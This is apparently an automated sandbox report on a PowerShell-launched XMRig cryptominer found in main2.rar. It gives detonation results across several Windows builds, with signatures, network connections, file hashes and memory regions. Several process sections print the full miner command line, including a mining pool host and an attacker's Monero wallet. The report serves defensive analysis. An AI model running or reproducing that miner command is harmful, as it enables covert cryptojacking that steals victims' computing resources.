Malware Analysis Report

2025-04-19 17:54

Sample ID: 240527-ar7bcahf3y
Target: main2.rar
SHA256: 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags: execution, xmrig, miner
Score: 10/10

Analysis Overview

Score: 10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

execution xmrig miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 00:27

Signatures

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:14

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

N/A

Files


Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:23

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arrr5yhg.hwf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:50

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k32oa2nn.ep3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:51

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.178.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yklebnat.tv5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


memory/4880-110-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-111-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-112-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-113-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-114-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-115-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-116-0x00007FF787660000-0x00007FF788293000-memory.dmp

memory/4880-117-0x00007FF787660000-0x00007FF788293000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:52

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1770s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/424-3-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/424-5-0x0000017AF8A00000-0x0000017AF8A22000-memory.dmp

memory/424-6-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-9-0x0000017AF8CE0000-0x0000017AF8D56000-memory.dmp

memory/424-10-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2urym15v.drn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/424-25-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/424-48-0x0000017AF8CC0000-0x0000017AF8CD2000-memory.dmp

memory/424-61-0x0000017AF8CB0000-0x0000017AF8CBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1376-90-0x0000013F164E0000-0x0000013F16500000-memory.dmp

memory/424-92-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/1376-91-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/424-94-0x00007FFF29BE3000-0x00007FFF29BE4000-memory.dmp

memory/1376-93-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/424-95-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/1376-96-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-97-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-98-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-99-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-100-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-101-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-102-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-103-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-104-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-105-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-106-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-107-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-108-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-109-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-110-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-111-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-112-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-113-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-114-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-115-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-116-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-117-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-118-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-119-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-120-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-121-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-122-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-123-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-124-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-125-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-126-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-127-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-128-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-129-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-130-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-131-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-132-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-133-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-134-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-135-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-136-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-137-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-138-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-139-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-140-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-141-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-142-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-143-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-144-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-145-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-146-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-147-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-148-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-149-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-150-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-151-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-152-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-153-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-154-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-155-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

memory/1376-156-0x00007FF65E300000-0x00007FF65EF33000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:11

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1745s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
